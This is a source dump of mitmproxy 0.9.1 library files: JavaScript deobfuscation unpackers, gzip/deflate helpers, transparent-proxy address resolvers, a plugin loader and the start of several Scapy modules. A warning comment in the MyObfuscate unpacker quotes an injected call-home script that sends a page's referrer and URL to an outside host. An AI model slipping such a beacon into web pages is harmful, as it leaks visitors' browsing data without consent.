40 | UNPACKERS = getunpackers()
41 | 
42 | def run(source, evalcode=False):
43 |     """Runs the applicable unpackers and return unpacked source as a string."""
44 |     for unpacker in [mod for mod in UNPACKERS if mod.detect(source)]:
45 |         source = unpacker.unpack(source)
46 |     if evalcode and evalbased.detect(source):
47 |         source = evalbased.unpack(source)
48 |     return source
49 | 
50 | def filtercomments(source):
51 |     """NOT USED: strips trailing comments and put them at the top."""
52 |     trailing_comments = []
53 |     comment = True
54 | 
55 |     while comment:
56 |         if re.search(r'^\s*\/\*', source):
57 |             comment = source[0, source.index('*/') + 2]
58 |         elif re.search(r'^\s*\/\/', source):
59 |             comment = re.search(r'^\s*\/\/', source).group(0)
60 |         else:
61 |             comment = None
62 | 
63 |         if comment:
64 |             source = re.sub(r'^\s+', '', source[len(comment):])
65 |             trailing_comments.append(comment)
66 | 
67 |     return '\n'.join(trailing_comments) + source
68 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/evalbased.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Unpacker for eval() based packers, a part of javascript beautifier
 3 | # by Einar Lielmanis <einar@jsbeautifier.org>
 4 | #
 5 | #     written by Stefano Sanfilippo <a.little.coder@gmail.com>
 6 | #
 7 | # usage:
 8 | #
 9 | # if detect(some_string):
10 | #     unpacked = unpack(some_string)
11 | #
12 | 
13 | """Unpacker for eval() based packers: runs JS code and returns result.
14 | Works only if a JS interpreter (e.g. Mozilla's Rhino) is installed and
15 | properly set up on host."""
16 | 
17 | from subprocess import PIPE, Popen
18 | 
19 | PRIORITY = 3
20 | 
21 | def detect(source):
22 |     """Detects if source is likely to be eval() packed."""
23 |     return source.strip().lower().startswith('eval(function(')
24 | 
25 | def unpack(source):
26 |     """Runs source and return resulting code."""
27 |     return jseval('print %s;' % source[4:]) if detect(source) else source
28 | 
29 | # In case of failure, we'll just return the original, without crashing on user.
30 | def jseval(script):
31 |     """Run code in the JS interpreter and return output."""
32 |     try:
33 |         interpreter = Popen(['js'], stdin=PIPE, stdout=PIPE)
34 |     except OSError:
35 |         return script
36 |     result, errors = interpreter.communicate(script)
37 |     if interpreter.poll() or errors:
38 |         return script
39 |     return result
40 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/javascriptobfuscator.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # simple unpacker/deobfuscator for scripts messed up with
 3 | # javascriptobfuscator.com
 4 | #
 5 | #     written by Einar Lielmanis <einar@jsbeautifier.org>
 6 | #     rewritten in Python by Stefano Sanfilippo <a.little.coder@gmail.com>
 7 | #
 8 | # Will always return valid javascript: if `detect()` is false, `code` is
 9 | # returned, unmodified.
10 | #
11 | # usage:
12 | #
13 | # if javascriptobfuscator.detect(some_string):
14 | #     some_string = javascriptobfuscator.unpack(some_string)
15 | #
16 | 
17 | """deobfuscator for scripts messed up with JavascriptObfuscator.com"""
18 | 
19 | import re
20 | 
21 | PRIORITY = 1
22 | 
23 | def smartsplit(code):
24 |     """Split `code` at " symbol, only if it is not escaped."""
25 |     strings = []
26 |     pos = 0
27 |     while pos < len(code):
28 |         if code[pos] == '"':
29 |             word = '' # new word
30 |             pos += 1
31 |             while pos < len(code):
32 |                 if code[pos] == '"':
33 |                     break
34 |                 if code[pos] == '\\':
35 |                     word += '\\'
36 |                     pos += 1
37 |                 word += code[pos]
38 |                 pos += 1
39 |             strings.append('"%s"' % word)
40 |         pos += 1
41 |     return strings
42 | 
43 | def detect(code):
44 |     """Detects if `code` is JavascriptObfuscator.com packed."""
45 |     # prefer `is not` idiom, so that a true boolean is returned
46 |     return (re.search(r'^var _0x[a-f0-9]+ ?\= ?\[', code) is not None)
47 | 
48 | def unpack(code):
49 |     """Unpacks JavascriptObfuscator.com packed code."""
50 |     if detect(code):
51 |         matches = re.search(r'var (_0x[a-f\d]+) ?\= ?\[(.*?)\];', code)
52 |         if matches:
53 |             variable = matches.group(1)
54 |             dictionary = smartsplit(matches.group(2))
55 |             code = code[len(matches.group(0)):]
56 |             for key, value in enumerate(dictionary):
57 |                 code = code.replace(r'%s[%s]' % (variable, key), value)
58 |     return code
59 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/myobfuscate.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # deobfuscator for scripts messed up with myobfuscate.com
 3 | # by Einar Lielmanis <einar@jsbeautifier.org>
 4 | #
 5 | #     written by Stefano Sanfilippo <a.little.coder@gmail.com>
 6 | #
 7 | # usage:
 8 | #
 9 | # if detect(some_string):
10 | #     unpacked = unpack(some_string)
11 | #
12 | 
13 | # CAVEAT by Einar Lielmanis
14 | 
15 | #
16 | # You really don't want to obfuscate your scripts there: they're tracking
17 | # your unpackings, your script gets turned into something like this,
18 | # as of 2011-08-26:
19 | #
20 | #   var _escape = 'your_script_escaped';
21 | #   var _111 = document.createElement('script');
22 | #   _111.src = 'http://api.www.myobfuscate.com/?getsrc=ok' +
23 | #              '&ref=' + encodeURIComponent(document.referrer) +
24 | #              '&url=' + encodeURIComponent(document.URL);
25 | #   var 000 = document.getElementsByTagName('head')[0];
26 | #   000.appendChild(_111);
27 | #   document.write(unescape(_escape));
28 | #
29 | 
30 | """Deobfuscator for scripts messed up with MyObfuscate.com"""
31 | 
32 | import re
33 | import base64
34 | 
35 | # Python 2 retrocompatibility
36 | # pylint: disable=F0401
37 | # pylint: disable=E0611
38 | try:
39 |     from urllib import unquote
40 | except ImportError:
41 |     from urllib.parse import unquote
42 | 
43 | from jsbeautifier.unpackers import UnpackingError
44 | 
45 | PRIORITY = 1
46 | 
47 | CAVEAT = """//
48 | // Unpacker warning: be careful when using myobfuscate.com for your projects:
49 | // scripts obfuscated by the free online version call back home.
50 | //
51 | 
52 | """
53 | 
54 | SIGNATURE = (r'["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F'
55 |              r'\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65'
56 |              r'\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75'
57 |              r'\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B'
58 |              r'\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78'
59 |              r'\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","'
60 |              r'\x6C\x65\x6E\x67\x74\x68"]')
61 | 
62 | def detect(source):
63 |     """Detects MyObfuscate.com packer."""
64 |     return SIGNATURE in source
65 | 
66 | def unpack(source):
67 |     """Unpacks js code packed with MyObfuscate.com"""
68 |     if not detect(source):
69 |         return source
70 |     payload = unquote(_filter(source))
71 |     match = re.search(r"^var _escape\='<script>(.*)<\/script>'",
72 |                       payload, re.DOTALL)
73 |     polished = match.group(1) if match else source
74 |     return CAVEAT + polished
75 | 
76 | def _filter(source):
77 |     """Extracts and decode payload (original file) from `source`"""
78 |     try:
79 |         varname = re.search(r'eval\(\w+\(\w+\((\w+)\)\)\);', source).group(1)
80 |         reverse = re.search(r"var +%s *\= *'(.*)';" % varname, source).group(1)
81 |     except AttributeError:
82 |         raise UnpackingError('Malformed MyObfuscate data.')
83 |     try:
84 |         return base64.b64decode(reverse[::-1].encode('utf8')).decode('utf8')
85 |     except TypeError:
86 |         raise UnpackingError('MyObfuscate payload is not base64-encoded.')
87 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/packer.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Unpacker for Dean Edward's p.a.c.k.e.r, a part of javascript beautifier
  3 | # by Einar Lielmanis <einar@jsbeautifier.org>
  4 | #
  5 | #     written by Stefano Sanfilippo <a.little.coder@gmail.com>
  6 | #
  7 | # usage:
  8 | #
  9 | # if detect(some_string):
 10 | #     unpacked = unpack(some_string)
 11 | #
 12 | 
 13 | """Unpacker for Dean Edward's p.a.c.k.e.r"""
 14 | 
 15 | import re
 16 | import string
 17 | from jsbeautifier.unpackers import UnpackingError
 18 | 
 19 | PRIORITY = 1
 20 | 
 21 | def detect(source):
 22 |     """Detects whether `source` is P.A.C.K.E.R. coded."""
 23 |     return source.replace(' ', '').startswith('eval(function(p,a,c,k,e,r')
 24 | 
 25 | def unpack(source):
 26 |     """Unpacks P.A.C.K.E.R. packed js code."""
 27 |     payload, symtab, radix, count = _filterargs(source)
 28 | 
 29 |     if count != len(symtab):
 30 |         raise UnpackingError('Malformed p.a.c.k.e.r. symtab.')
 31 | 
 32 |     try:
 33 |         unbase = Unbaser(radix)
 34 |     except TypeError:
 35 |         raise UnpackingError('Unknown p.a.c.k.e.r. encoding.')
 36 | 
 37 |     def lookup(match):
 38 |         """Look up symbols in the synthetic symtab."""
 39 |         word  = match.group(0)
 40 |         return symtab[unbase(word)] or word
 41 | 
 42 |     source = re.sub(r'\b\w+\b', lookup, payload)
 43 |     return _replacestrings(source)
 44 | 
 45 | def _filterargs(source):
 46 |     """Juice from a source file the four args needed by decoder."""
 47 |     argsregex = (r"}\('(.*)', *(\d+), *(\d+), *'(.*)'\."
 48 |                  r"split\('\|'\), *(\d+), *(.*)\)\)")
 49 |     args = re.search(argsregex, source, re.DOTALL).groups()
 50 | 
 51 |     try:
 52 |         return args[0], args[3].split('|'), int(args[1]), int(args[2])
 53 |     except ValueError:
 54 |         raise UnpackingError('Corrupted p.a.c.k.e.r. data.')
 55 | 
 56 | def _replacestrings(source):
 57 |     """Strip string lookup table (list) and replace values in source."""
 58 |     match = re.search(r'var *(_\w+)\=\["(.*?)"\];', source, re.DOTALL)
 59 | 
 60 |     if match:
 61 |         varname, strings = match.groups()
 62 |         startpoint = len(match.group(0))
 63 |         lookup = strings.split('","')
 64 |         variable = '%s[%%d]' % varname
 65 |         for index, value in enumerate(lookup):
 66 |             source = source.replace(variable % index, '"%s"' % value)
 67 |         return source[startpoint:]
 68 |     return source
 69 | 
 70 | 
 71 | class Unbaser(object):
 72 |     """Functor for a given base. Will efficiently convert
 73 |     strings to natural numbers."""
 74 |     ALPHABET  = {
 75 |         62 : '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
 76 |         95 : (' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ'
 77 |               '[\]^_`abcdefghijklmnopqrstuvwxyz{|}~')
 78 |     }
 79 | 
 80 |     def __init__(self, base):
 81 |         self.base = base
 82 | 
 83 |         # If base can be handled by int() builtin, let it do it for us
 84 |         if 2 <= base <= 36:
 85 |             self.unbase = lambda string: int(string, base)
 86 |         else:
 87 |             # Build conversion dictionary cache
 88 |             try:
 89 |                 self.dictionary = dict((cipher, index) for
 90 |                     index, cipher in enumerate(self.ALPHABET[base]))
 91 |             except KeyError:
 92 |                 raise TypeError('Unsupported base encoding.')
 93 | 
 94 |             self.unbase = self._dictunbaser
 95 | 
 96 |     def __call__(self, string):
 97 |         return self.unbase(string)
 98 | 
 99 |     def _dictunbaser(self, string):
100 |         """Decodes a  value to an integer."""
101 |         ret = 0
102 |         for index, cipher in enumerate(string[::-1]):
103 |             ret += (self.base ** index) * self.dictionary[cipher]
104 |         return ret
105 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/urlencode.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Trivial bookmarklet/escaped script detector for the javascript beautifier
 3 | #     written by Einar Lielmanis <einar@jsbeautifier.org>
 4 | #     rewritten in Python by Stefano Sanfilippo <a.little.coder@gmail.com>
 5 | #
 6 | # Will always return valid javascript: if `detect()` is false, `code` is
 7 | # returned, unmodified.
 8 | #
 9 | # usage:
10 | #
11 | # some_string = urlencode.unpack(some_string)
12 | #
13 | 
14 | """Bookmarklet/escaped script unpacker."""
15 | 
16 | # Python 2 retrocompatibility
17 | # pylint: disable=F0401
18 | # pylint: disable=E0611
19 | try:
20 |     from urllib import unquote_plus
21 | except ImportError:
22 |     from urllib.parse import unquote_plus
23 | 
24 | PRIORITY = 0
25 | 
26 | def detect(code):
27 |     """Detects if a scriptlet is urlencoded."""
28 |     # the fact that script doesn't contain any space, but has %20 instead
29 |     # should be sufficient check for now.
30 |     return ' ' not in code and ('%20' in code or code.count('%') > 3)
31 | 
32 | def unpack(code):
33 |     """URL decode `code` source string."""
34 |     return unquote_plus(code) if detect(code) else code
35 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/encoding.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2012  Aldo Cortesi
 2 | #
 3 | # This program is free software: you can redistribute it and/or modify
 4 | # it under the terms of the GNU General Public License as published by
 5 | # the Free Software Foundation, either version 3 of the License, or
 6 | # (at your option) any later version.
 7 | #
 8 | # This program is distributed in the hope that it will be useful,
 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with this program.  If not, see <http://www.gnu.org/licenses/>.
15 | 
16 | """
17 |     Utility functions for decoding response bodies.
18 | """
19 | import cStringIO
20 | import gzip, zlib
21 | 
22 | __ALL__ = ["ENCODINGS"]
23 | 
24 | ENCODINGS = set(["identity", "gzip", "deflate"])
25 | 
26 | def decode(e, content):
27 |     encoding_map = {
28 |         "identity": identity,
29 |         "gzip": decode_gzip,
30 |         "deflate": decode_deflate,
31 |     }
32 |     if e not in encoding_map:
33 |         return None
34 |     return encoding_map[e](content)
35 | 
36 | def encode(e, content):
37 |     encoding_map = {
38 |         "identity": identity,
39 |         "gzip": encode_gzip,
40 |         "deflate": encode_deflate,
41 |     }
42 |     if e not in encoding_map:
43 |         return None
44 |     return encoding_map[e](content)
45 | 
46 | def identity(content):
47 |     """
48 |         Returns content unchanged. Identity is the default value of
49 |         Accept-Encoding headers.
50 |     """
51 |     return content
52 | 
53 | def decode_gzip(content):
54 |     gfile = gzip.GzipFile(fileobj=cStringIO.StringIO(content))
55 |     try:
56 |         return gfile.read()
57 |     except (IOError, EOFError):
58 |         return None
59 | 
60 | def encode_gzip(content):
61 |     s = cStringIO.StringIO()
62 |     gf = gzip.GzipFile(fileobj=s, mode='wb')
63 |     gf.write(content)
64 |     gf.close()
65 |     return s.getvalue()
66 | 
67 | def decode_deflate(content):
68 |     """
69 |         Returns decompressed data for DEFLATE. Some servers may respond with
70 |         compressed data without a zlib header or checksum. An undocumented
71 |         feature of zlib permits the lenient decompression of data missing both
72 |         values.
73 | 
74 |         http://bugs.python.org/issue5784
75 |     """
76 |     try:
77 |         try:
78 |             return zlib.decompress(content)
79 |         except zlib.error:
80 |             return zlib.decompress(content, -15)
81 |     except zlib.error:
82 |         return None
83 | 
84 | def encode_deflate(content):
85 |     """
86 |         Returns compressed content, always including zlib header and checksum.
87 |     """
88 |     return zlib.compress(content)
89 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/platform/__init__.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | 
 3 | resolver = None
 4 | if sys.platform == "linux2":
 5 |     import linux
 6 |     resolver = linux.Resolver
 7 | elif sys.platform == "darwin":
 8 |     import osx
 9 |     resolver = osx.Resolver
10 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/platform/linux.py:
--------------------------------------------------------------------------------
 1 | import socket, struct, fcntl
 2 | 
 3 | # Python socket module does not have this constant
 4 | SO_ORIGINAL_DST = 80
 5 | 
 6 | class Resolver:
 7 |     def original_addr(self, csock):
 8 |         odestdata = csock.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16)
 9 |         _, port, a1, a2, a3, a4 = struct.unpack("!HHBBBBxxxxxxxx", odestdata)
10 |         address = "%d.%d.%d.%d" % (a1, a2, a3, a4)
11 |         return address, port
12 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/platform/osx.py:
--------------------------------------------------------------------------------
 1 | import subprocess
 2 | import pf
 3 | 
 4 | """
 5 |     Doing this the "right" way by using DIOCNATLOOK on the pf device turns out
 6 |     to be a pain. Apple has made a number of modifications to the data
 7 |     structures returned, and compiling userspace tools to test and work with
 8 |     this turns out to be a pain in the ass. Parsing pfctl output is short,
 9 |     simple, and works.
10 | """
11 | 
12 | class Resolver:
13 |     STATECMD = ("sudo", "-n", "/sbin/pfctl", "-s", "state")
14 |     def __init__(self):
15 |         pass
16 | 
17 |     def original_addr(self, csock):
18 |         peer = csock.getpeername()
19 |         try:
20 |             stxt = subprocess.check_output(self.STATECMD, stderr=subprocess.STDOUT)
21 |         except subprocess.CalledProcessError:
22 |             return None
23 |         return pf.lookup(peer[0], peer[1], stxt)
24 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/platform/pf.py:
--------------------------------------------------------------------------------
 1 | 
 2 | def lookup(address, port, s):
 3 |     """
 4 |         Parse the pfctl state output s, to look up the destination host
 5 |         matching the client (address, port).
 6 | 
 7 |         Returns an (address, port) tuple, or None.
 8 |     """
 9 |     spec = "%s:%s"%(address, port)
10 |     for i in s.split("\n"):
11 |         if "ESTABLISHED:ESTABLISHED" in i and spec in i:
12 |             s = i.split()
13 |             if len(s) > 4:
14 |                 s = s[4].split(":")
15 |                 if len(s) == 2:
16 |                     return s[0], int(s[1])
17 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/script.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2012  Aldo Cortesi
 2 | #
 3 | # This program is free software: you can redistribute it and/or modify
 4 | # it under the terms of the GNU General Public License as published by
 5 | # the Free Software Foundation, either version 3 of the License, or
 6 | # (at your option) any later version.
 7 | #
 8 | # This program is distributed in the hope that it will be useful,
 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with this program.  If not, see <http://www.gnu.org/licenses/>.
15 | 
16 | import os, traceback
17 | 
18 | class ScriptError(Exception):
19 |     pass
20 | 
21 | 
22 | class Script:
23 |     """
24 |         The instantiator should do something along this vein:
25 | 
26 |             s = Script(path, master)
27 |             s.load()
28 |             s.run("start")
29 |     """
30 |     def __init__(self, path, ctx):
31 |         self.path, self.ctx = path, ctx
32 |         self.ns = None
33 | 
34 |     def load(self):
35 |         """
36 |             Loads a module.
37 | 
38 |             Raises ScriptError on failure, with argument equal to an error
39 |             message that may be a formatted traceback.
40 |         """
41 |         path = os.path.expanduser(self.path)
42 |         if not os.path.exists(path):
43 |             raise ScriptError("No such file: %s"%self.path)
44 |         if not os.path.isfile(path):
45 |             raise ScriptError("Not a file: %s"%self.path)
46 |         ns = {}
47 |         try:
48 |             execfile(path, ns, ns)
49 |         except Exception, v:
50 |             raise ScriptError(traceback.format_exc(v))
51 |         self.ns = ns
52 | 
53 |     def run(self, name, *args, **kwargs):
54 |         """
55 |             Runs a plugin method.
56 | 
57 |             Returns:
58 | 
59 |                 (True, retval) on success.
60 |                 (False, None) on nonexistent method.
61 |                 (False, (exc, traceback string)) if there was an exception.
62 |         """
63 |         f = self.ns.get(name)
64 |         if f:
65 |             try:
66 |                 return (True, f(self.ctx, *args, **kwargs))
67 |             except Exception, v:
68 |                 return (False, (v, traceback.format_exc(v)))
69 |         else:
70 |             return (False, None)
71 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/version.py:
--------------------------------------------------------------------------------
1 | IVERSION = (0, 9, 1)
2 | VERSION = ".".join(str(i) for i in IVERSION)
3 | NAME = "mitmproxy"
4 | NAMEVERSION = NAME + " " + VERSION
5 | 


--------------------------------------------------------------------------------
/src/lib/scapy/__init__.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | 
 8 | if __name__ == "__main__":
 9 |     from scapy.main import interact
10 |     interact()
11 | 


--------------------------------------------------------------------------------
/src/lib/scapy/all.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | from base_classes import *
 8 | from config import *
 9 | from dadict import *
10 | from data import *
11 | from error import *
12 | from themes import *
13 | from arch import *
14 | 
15 | from plist import *
16 | from fields import *
17 | from packet import *
18 | from asn1fields import *
19 | from asn1packet import *
20 | 
21 | from utils import *
22 | from route import *
23 | if conf.ipv6_enabled:
24 |     from utils6 import *
25 |     from route6 import *
26 | from sendrecv import *
27 | from supersocket import *
28 | from volatile import *
29 | from as_resolvers import *
30 | 
31 | from ansmachine import *
32 | from automaton import *
33 | from autorun import *
34 | 
35 | from main import *
36 | 
37 | from layers.all import *
38 | 
39 | from asn1.asn1 import *
40 | from asn1.ber import *
41 | from asn1.mib import *
42 | 
43 | 
44 | 
45 | 


--------------------------------------------------------------------------------
/src/lib/scapy/ansmachine.py:
--------------------------------------------------------------------------------
  1 | ## This file is part of Scapy
  2 | ## See http://www.secdev.org/projects/scapy for more informations
  3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
  4 | ## This program is published under a GPLv2 license
  5 | 
  6 | ########################
  7 | ## Answering machines ##
  8 | ########################
  9 | 
 10 | from sendrecv import send,sendp,sniff
 11 | from config import conf
 12 | from error import log_interactive
 13 | 
 14 | class ReferenceAM(type):
 15 |     def __new__(cls, name, bases, dct):
 16 |         o = super(ReferenceAM, cls).__new__(cls, name, bases, dct)
 17 |         if o.function_name:
 18 |             globals()[o.function_name] = lambda o=o,*args,**kargs: o(*args,**kargs)()
 19 |         return o
 20 | 
 21 | 
 22 | class AnsweringMachine(object):
 23 |     __metaclass__ = ReferenceAM
 24 |     function_name = ""
 25 |     filter = None
 26 |     sniff_options = { "store":0 }
 27 |     sniff_options_list = [ "store", "iface", "count", "promisc", "filter", "type", "prn" ]
 28 |     send_options = { "verbose":0 }
 29 |     send_options_list = ["iface", "inter", "loop", "verbose"]
 30 |     send_function = staticmethod(send)
 31 |     
 32 |     
 33 |     def __init__(self, **kargs):
 34 |         self.mode = 0
 35 |         if self.filter:
 36 |             kargs.setdefault("filter",self.filter)
 37 |         kargs.setdefault("prn", self.reply)
 38 |         self.optam1 = {}
 39 |         self.optam2 = {}
 40 |         self.optam0 = {}
 41 |         doptsend,doptsniff = self.parse_all_options(1, kargs)
 42 |         self.defoptsend = self.send_options.copy()
 43 |         self.defoptsend.update(doptsend)
 44 |         self.defoptsniff = self.sniff_options.copy()
 45 |         self.defoptsniff.update(doptsniff)
 46 |         self.optsend,self.optsniff = [{},{}]
 47 | 
 48 |     def __getattr__(self, attr):
 49 |         for d in [self.optam2, self.optam1]:
 50 |             if attr in d:
 51 |                 return d[attr]
 52 |         raise AttributeError,attr
 53 |                 
 54 |     def __setattr__(self, attr, val):
 55 |         mode = self.__dict__.get("mode",0)
 56 |         if mode == 0:
 57 |             self.__dict__[attr] = val
 58 |         else:
 59 |             [self.optam1, self.optam2][mode-1][attr] = val
 60 | 
 61 |     def parse_options(self):
 62 |         pass
 63 | 
 64 |     def parse_all_options(self, mode, kargs):
 65 |         sniffopt = {}
 66 |         sendopt = {}
 67 |         for k in kargs.keys():            
 68 |             if k in self.sniff_options_list:
 69 |                 sniffopt[k] = kargs[k]
 70 |             if k in self.send_options_list:
 71 |                 sendopt[k] = kargs[k]
 72 |             if k in self.sniff_options_list+self.send_options_list:
 73 |                 del(kargs[k])
 74 |         if mode != 2 or kargs:
 75 |             if mode == 1:
 76 |                 self.optam0 = kargs
 77 |             elif mode == 2 and kargs:
 78 |                 k = self.optam0.copy()
 79 |                 k.update(kargs)
 80 |                 self.parse_options(**k)
 81 |                 kargs = k 
 82 |             omode = self.__dict__.get("mode",0)
 83 |             self.__dict__["mode"] = mode
 84 |             self.parse_options(**kargs)
 85 |             self.__dict__["mode"] = omode
 86 |         return sendopt,sniffopt
 87 | 
 88 |     def is_request(self, req):
 89 |         return 1
 90 | 
 91 |     def make_reply(self, req):
 92 |         return req
 93 | 
 94 |     def send_reply(self, reply):
 95 |         self.send_function(reply, **self.optsend)
 96 | 
 97 |     def print_reply(self, req, reply):
 98 |         print "%s ==> %s" % (req.summary(),reply.summary())
 99 | 
100 |     def reply(self, pkt):
101 |         if not self.is_request(pkt):
102 |             return
103 |         reply = self.make_reply(pkt)
104 |         self.send_reply(reply)
105 |         if conf.verb >= 0:
106 |             self.print_reply(pkt, reply)
107 | 
108 |     def run(self, *args, **kargs):
109 |         log_interactive.warning("run() method deprecated. The intance is now callable")
110 |         self(*args,**kargs)
111 | 
112 |     def __call__(self, *args, **kargs):
113 |         optsend,optsniff = self.parse_all_options(2,kargs)
114 |         self.optsend=self.defoptsend.copy()
115 |         self.optsend.update(optsend)
116 |         self.optsniff=self.defoptsniff.copy()
117 |         self.optsniff.update(optsniff)
118 | 
119 |         try:
120 |             self.sniff()
121 |         except KeyboardInterrupt:
122 |             print "Interrupted by user"
123 |         
124 |     def sniff(self):
125 |         sniff(**self.optsniff)
126 | 
127 | 


--------------------------------------------------------------------------------
/src/lib/scapy/arch/__init__.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | import sys,os,socket
 8 | from scapy.error import *
 9 | import scapy.config
10 | 
11 | try:
12 |     import Gnuplot
13 |     GNUPLOT=1
14 | except ImportError:
15 |     log_loading.info("Can't import python gnuplot wrapper . Won't be able to plot.")
16 |     GNUPLOT=0
17 | 
18 | try:
19 |     import pyx
20 |     PYX=1
21 | except ImportError:
22 |     log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().")
23 |     PYX=0
24 | 
25 | 
26 | def str2mac(s):
27 |     return ("%02x:"*6)[:-1] % tuple(map(ord, s)) 
28 | 
29 | 
30 |     
31 | def get_if_addr(iff):
32 |     return socket.inet_ntoa(get_if_raw_addr(iff))
33 |     
34 | def get_if_hwaddr(iff):
35 |     addrfamily, mac = get_if_raw_hwaddr(iff)
36 |     if addrfamily in [ARPHDR_ETHER,ARPHDR_LOOPBACK]:
37 |         return str2mac(mac)
38 |     else:
39 |         raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily,iff))
40 | 
41 | 
42 | LINUX=sys.platform.startswith("linux")
43 | OPENBSD=sys.platform.startswith("openbsd")
44 | FREEBSD=sys.platform.startswith("freebsd")
45 | NETBSD = sys.platform.startswith("netbsd")
46 | DARWIN=sys.platform.startswith("darwin")
47 | SOLARIS=sys.platform.startswith("sunos")
48 | WINDOWS=sys.platform.startswith("win32")
49 | 
50 | X86_64 = not WINDOWS and (os.uname()[4] == 'x86_64')
51 | 
52 | 
53 | # Next step is to import following architecture specific functions:
54 | # def get_if_raw_hwaddr(iff)
55 | # def get_if_raw_addr(iff):
56 | # def get_if_list():
57 | # def get_working_if():
58 | # def attach_filter(s, filter):
59 | # def set_promisc(s,iff,val=1):
60 | # def read_routes():
61 | # def get_if(iff,cmd):
62 | # def get_if_index(iff):
63 | 
64 | 
65 | 
66 | if LINUX:
67 |     from linux import *
68 |     if scapy.config.conf.use_pcap or scapy.config.conf.use_dnet:
69 |         from pcapdnet import *
70 | elif OPENBSD or FREEBSD or NETBSD or DARWIN:
71 |     from bsd import *
72 | elif SOLARIS:
73 |     from solaris import *
74 | elif WINDOWS:
75 |     from windows import *
76 | 
77 | if scapy.config.conf.iface is None:
78 |     scapy.config.conf.iface = LOOPBACK_NAME
79 | 
80 | 
81 | def get_if_raw_addr6(iff):
82 |     """
83 |     Returns the main global unicast address associated with provided 
84 |     interface, in network format. If no global address is found, None 
85 |     is returned. 
86 |     """
87 |     r = filter(lambda x: x[2] == iff and x[1] == IPV6_ADDR_GLOBAL, in6_getifaddr())
88 |     if len(r) == 0:
89 |         return None
90 |     else:
91 |         r = r[0][0] 
92 |     return inet_pton(socket.AF_INET6, r)
93 | 


--------------------------------------------------------------------------------
/src/lib/scapy/arch/bsd.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | 
 8 | LOOPBACK_NAME="lo0"
 9 | 
10 | from unix import *
11 | 


--------------------------------------------------------------------------------
/src/lib/scapy/arch/solaris.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | # IPPROTO_GRE is missing on Solaris
 8 | import socket
 9 | socket.IPPROTO_GRE = 47
10 | 
11 | LOOPBACK_NAME="lo0"
12 | 
13 | from unix import *
14 | 


--------------------------------------------------------------------------------
/src/lib/scapy/as_resolvers.py:
--------------------------------------------------------------------------------
  1 | ## This file is part of Scapy
  2 | ## See http://www.secdev.org/projects/scapy for more informations
  3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
  4 | ## This program is published under a GPLv2 license
  5 | 
  6 | import socket
  7 | from config import conf
  8 | 
  9 | class AS_resolver:
 10 |     server = None
 11 |     options = "-k" 
 12 |     def __init__(self, server=None, port=43, options=None):
